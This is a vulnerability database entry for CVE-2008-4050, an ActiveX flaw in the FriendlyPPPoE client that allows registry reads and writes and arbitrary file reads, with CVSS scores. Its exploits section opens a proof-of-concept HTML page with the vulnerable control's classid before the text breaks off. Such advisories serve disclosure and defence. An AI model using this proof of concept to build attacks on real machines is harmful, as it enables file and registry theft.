9.3
CVSSv2

CVE-2008-4050

Published: 11/09/2008 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

A certain ActiveX control in fwRemoteCfg.dll 3.3.3.1 in Friendly Technologies FriendlyPPPoE Client 3.0.0.57 allows remote malicious users to (1) create and read arbitrary registry values via the RegistryValue method, and (2) read arbitrary files via the GetTextFile method.

Vulnerable Product Search on Vulmon Subscribe to Product

friendly technologies friendly pppoe client 3.0.0.57

Exploits

<!-- Proof of Concept Read write to registry and also read files More codes at ircnixcoil/#binaryvision ! --> <html> <title>Friendly Technologies - Read/Write Registry</title> <object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='FT'></object> <script language='Javascript'> // Write to ...